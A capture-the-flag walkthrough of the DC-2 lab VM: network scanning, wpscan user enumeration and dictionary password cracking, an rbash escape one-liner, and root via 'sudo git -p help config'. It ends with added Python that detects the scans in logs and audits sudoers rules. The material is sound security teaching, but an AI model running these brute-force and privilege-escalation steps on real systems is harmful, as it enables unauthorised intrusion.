DC-2 Write Up
Boot DC-2 in VirtualBox and run the following in a terminal.
┌──(root💀snowyowl)-[~]
└─# netdiscover
 11 Captured ARP Req/Rep packets, from 7 hosts.   Total size: 516

   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.3.13    08:00:27:a8:0d:dc      1      60  PCS Systemtechnik GmbH
 192.168.3.1     30:f7:72:be:b9:b9      4     168  Hon Hai Precision Ind. Co.,Ltd.
 192.168.3.2     10:6f:3f:e6:28:40      1      60  BUFFALO.INC
 192.168.3.7     44:09:b8:8c:f4:72      1      60  Salcomp (Shenzhen) CO., LTD.
 192.168.3.14    9e:29:3c:88:76:24      1      42  Unknown vendor
 192.168.3.15    70:bc:10:6a:f6:c1      2      84  Microsoft Corporation
 192.168.10.1    30:f7:72:be:b9:b9      1      42  Hon Hai Precision Ind. Co.,Ltd.
VirtualBox NICs show up as PCS Systemtechnik GmbH, so DC-2's local IP is 192.168.3.13.
Check this IP with nmap.
Options used here:
-sS: stealth (SYN) scan; it does not return the ACK packet of the three-way handshake.
-A: OS detection and detailed version detection.
-p-: scan all ports (except 0 and 9100).
┌──(root💀snowyowl)-[~]
└─# nmap -sS -A 192.168.3.13 -p-
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 20:15 JST
Nmap scan report for dc-2 (192.168.3.13)
Host is up (0.00060s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 08:00:27:A8:0D:DC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.60 ms dc-2 (192.168.3.13)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.20 seconds
From this nmap output we learn two things:
・This server is a web server (Apache 2.4.10, with WordPress as the CMS).
・SSH, which is normally on port 22, has been moved to port 7744.
Since it is a web server, I entered the IP in a browser...
It is a local web server, so its hostname (the site redirects to http://dc-2/) cannot be resolved through DNS.
So edit /etc/hosts instead.
Once the entry is added to the hosts file,
the page displays properly.
Next, probe for exposed directories with nikto.
┌──(root💀snowyowl)-[~]
└─# nikto -h http://192.168.3.13
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.3.13
+ Target Hostname: 192.168.3.13
+ Target Port: 80
+ Start Time: 2021-07-27 19:35:47 (GMT9)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://dc-2/
+ Uncommon header 'link' found, with multiple values: (<http://dc-2/index.php/wp-json/>; rel="https://api.w.org/",<http://dc-2/>; rel=shortlink,)
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2021-07-27 19:37:12 (GMT9) (85 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
DC-1 last time had many exposed directories, but this time there are almost none
(only /wp-login.php: Wordpress login found).
I also looked for vulnerabilities in the Apache web server, but there is no notable exploit.
┌──(root💀snowyowl)-[~]
└─# searchsploit "Apache 2.4.10"
----------------------------------------------------------------- ---------------------------
 Exploit Title                                                   |  Path
----------------------------------------------------------------- ---------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution  | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | php/remote/29316.py
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak                 | linux/webapps/42745.py
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service              | multiple/dos/26710.txt
Apache OpenSSL - 'OpenFuck.c' Remote BufferOverflow              | unix/remote/21671.c
Apache OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)       | unix/remote/764.c
Apache OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)       | unix/remote/47080.c
Apache OpenMeetings - '.ZIP' File Directory Traversal            | linux/webapps/39642.txt
Apache Tomcat < 5.5.17 - Remote Directory Listing                | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal              | unix/remote/14489.c
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)        | multiple/remote/6229.txt
----------------------------------------------------------------- ---------------------------
Shellcodes: No Results
Since the web server itself offers nothing to attack, I go after the CMS instead. This is the same flow as DC-1 last time (DC-1 was Drupal).
For WordPress there is an officially distributed security tool, wpscan, so I use it.
https://ja.wordpress.org/plugins/wpscan/
wpscan has many interesting options, so
$ man wpscan
is worth browsing.
Options this time:
--url URL: specify the target URL.
-e u: enumerate user names.
┌──(root💀snowyowl)-[~]
└─# wpscan --url http://dc-2/ -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.18
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://dc-2/ [192.168.3.13]
[+] Started: Tue Jul 27 21:08:38 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Found By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, https://wordpress.org/?v=4.7.10
| - http://dc-2/index.php/comments/feed/, https://wordpress.org/?v=4.7.10
[+] WordPress theme in use: twentyseventeen
| Location: http://dc-2/wp-content/themes/twentyseventeen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.8
| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <=================> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Jul 27 21:08:44 2021
[+] Requests Done: 58
[+] Cached Requests: 6
[+] Data Sent: 14.674 KB
[+] Data Received: 514.805 KB
[+] Memory used: 160.348 MB
[+] Elapsed time: 00:00:06
・Three users were found: admin, jerry and tom.
Now look for the passwords of these three accounts.
The flag on DC-2's web page says cewl is a good idea, so use cewl.
cewl builds a word list out of the words found on a web page: a seeded password generator.
┌──(root💀snowyowl)-[~]
└─# cewl -w dc2-password.txt http://dc-2/
Pass the password list made with cewl to wpscan and look for the three accounts' passwords.
-P passwordfile: dictionary attack.
┌──(root💀snowyowl)-[~]
└─# wpscan --url http://dc-2/ -P dc2-password.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.18
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://dc-2/ [192.168.3.13]
[+] Started: Tue Jul 27 21:10:03 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Found By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, https://wordpress.org/?v=4.7.10
| - http://dc-2/index.php/comments/feed/, https://wordpress.org/?v=4.7.10
[+] WordPress theme in use: twentyseventeen
| Location: http://dc-2/wp-content/themes/twentyseventeen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.8
| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <========> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=========> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient
Trying admin / log Time: 00:01:26 <========> (646 / 1121) 57.62% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Jul 27 21:11:38 2021
[+] Requests Done: 801
[+] Cached Requests: 49
[+] Data Sent: 360.183 KB
[+] Data Received: 427.544 KB
[+] Memory used: 243.969 MB
[+] Elapsed time: 00:01:34
The passwords of two accounts are now known:
・Username: jerry, Password: adipiscing
・Username: tom, Password: parturient
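As an added defensive counterpart, not part of this write-up, the following Python flags in Apache access logs the three behaviours the wpscan runs above produce: author-ID brute forcing, a pull of the wp-json users endpoint, and a burst of POSTs to xmlrpc.php (the password attack). The log lines, the scanner IP 192.168.3.20 and the thresholds are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache combined-log line: client IP, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def parse_line(line):
    """Return (ip, datetime, method, path, status) or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status)

def detect(lines, xmlrpc_threshold=20, window_seconds=60, author_threshold=5):
    """Flag, per source IP, the three WPScan behaviours seen in this write-up."""
    xmlrpc = defaultdict(list)  # ip -> timestamps of POST /xmlrpc.php
    authors = defaultdict(set)  # ip -> distinct ?author=N values probed
    wpjson = set()              # ips that fetched the REST users endpoint
    for rec in filter(None, map(parse_line, lines)):
        ip, when, method, path, _ = rec
        if method == "POST" and path.split("?")[0] == "/xmlrpc.php":
            xmlrpc[ip].append(when)
        m = re.search(r"[?&]author=(\d+)", path)
        if m:
            authors[ip].add(m.group(1))
        if "/wp-json/wp/v2/users" in path:
            wpjson.add(ip)
    findings = set()
    k = xmlrpc_threshold
    for ip, t in xmlrpc.items():
        t.sort()
        # k consecutive POSTs inside window_seconds is a password attack, not pingback traffic
        if any((t[i + k - 1] - t[i]).total_seconds() <= window_seconds for i in range(len(t) - k + 1)):
            findings.add((ip, "xmlrpc-bruteforce"))
    findings |= {(ip, "author-id-enumeration") for ip, ids in authors.items() if len(ids) >= author_threshold}
    findings |= {(ip, "rest-user-enumeration") for ip in wpjson}
    return sorted(findings)

def sample_log():
    """Constructed log lines (not from DC-2): one scanning host and one ordinary feed reader."""
    fmt = '192.168.3.20 - - [27/Jul/2021:21:{m:02d}:{s:02d} +0900] "{me} {p} HTTP/1.1" {st} 512'
    lines = [fmt.format(m=8, s=i, me="GET", p=f"/?author={i}", st=301) for i in range(1, 11)]
    lines.append(fmt.format(m=8, s=20, me="GET", p="/index.php/wp-json/wp/v2/users/?per_page=100&page=1", st=200))
    lines += [fmt.format(m=10, s=i, me="POST", p="/xmlrpc.php", st=200) for i in range(25)]
    lines.append('192.168.3.15 - - [27/Jul/2021:21:12:00 +0900] "GET /index.php/feed/ HTTP/1.1" 200 2048')
    return lines
```

Running detect(sample_log()) reports all three behaviours for 192.168.3.20 and nothing for the feed reader; on a real server the thresholds should be tuned against normal xmlrpc.php volume (Jetpack and mobile apps also POST there).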
Use these to log in to DC-2's WordPress admin screen.
Go to the login directory found by nikto earlier and log in.
Checking flag2 shows that there are still more flags.
Next, connect to DC-2 over the SSH service nmap found.
Here,
$ ssh tom@192.168.3.13
does not connect.
This server's SSH port is 7744, so the port has to be specified.
$ ssh tom@192.168.3.13 -p 7744
It asks for a password; enter the one found earlier.
Listing the directory with ls reveals flag3.txt.
Trying to open it with cat fails,
because commands are restricted by rbash.
In a normal environment chsh would switch from rbash to bash, but on DC-2 that is not possible.
So switch to bash with
BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin
Displaying flag3.txt then gives
the following.
flag4
Apparently it wants us to become root.
Trying to gain root by entering sudo commands and the like does not work.
So use
sudo git -p help config
instead.
By spawning an interactive system shell, it breaks out of a restricted environment like this one.
https://gtfobins.github.io/gtfobins/git/
It works in any environment where sudo can run it, so it seems quite versatile.
Switch to root and display the flag with cat.
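The git trick above works only because a sudo rule lets git run as root without sudo's NOEXEC tag, which blocks the command from executing the pager. As an added defensive check, not from this write-up or GTFOBins, this Python audits sudoers user specifications for such rules; the sudoers fragments and the small list of pager-spawning programs are constructed assumptions.

```python
import re

# Programs that hand control to a pager or editor; run via sudo they yield a
# root shell (the git trick above) unless the rule carries sudo's NOEXEC tag.
PAGER_SPAWNERS = {"git", "less", "more", "man", "vi", "vim"}
USER_SPEC = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\)\s*)?(.+)$")

def parse_user_spec(line):
    """Parse 'user host = (runas) [TAG:] cmd, ...' into a dict; None for other lines."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith(("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")):
        return None
    m = USER_SPEC.match(line)
    if not m:
        return None
    user, host, runas, rest = m.groups()
    cmds, tags = [], set()
    for entry in rest.split(","):
        words = entry.split()
        # tags such as NOPASSWD: or NOEXEC: stay in force for later commands in the list
        tags |= {w[:-1] for w in words if w.endswith(":")}
        cmd = [w for w in words if not w.endswith(":")]
        if cmd:
            cmds.append({"tags": set(tags), "cmd": cmd[0], "args": cmd[1:]})
    return {"user": user, "host": host, "runas": runas or "root", "cmds": cmds}

def audit(sudoers_text):
    """Return (user, command, reason) for rules that give a shell-spawning program root."""
    findings = []
    for line in sudoers_text.splitlines():
        spec = parse_user_spec(line)
        if not spec:
            continue
        for c in spec["cmds"]:
            if c["cmd"] == "ALL":
                findings.append((spec["user"], "ALL", "unrestricted sudo"))
            elif c["cmd"].rsplit("/", 1)[-1] in PAGER_SPAWNERS and "NOEXEC" not in c["tags"]:
                findings.append((spec["user"], c["cmd"], "can spawn a pager/editor as root; add NOEXEC or remove the rule"))
    return findings

# Constructed sudoers fragments (not DC-2's real file): the weak rule and its fixed form.
WEAK_SUDOERS = "tom ALL=(ALL) /usr/bin/git\njerry ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart apache2\n"
FIXED_SUDOERS = "tom ALL=(ALL) NOEXEC: /usr/bin/git\njerry ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart apache2\n"
```

NOEXEC relies on sudo's LD_PRELOAD-based hook and only stops dynamically linked programs from exec'ing children, so removing the rule altogether is the stronger fix.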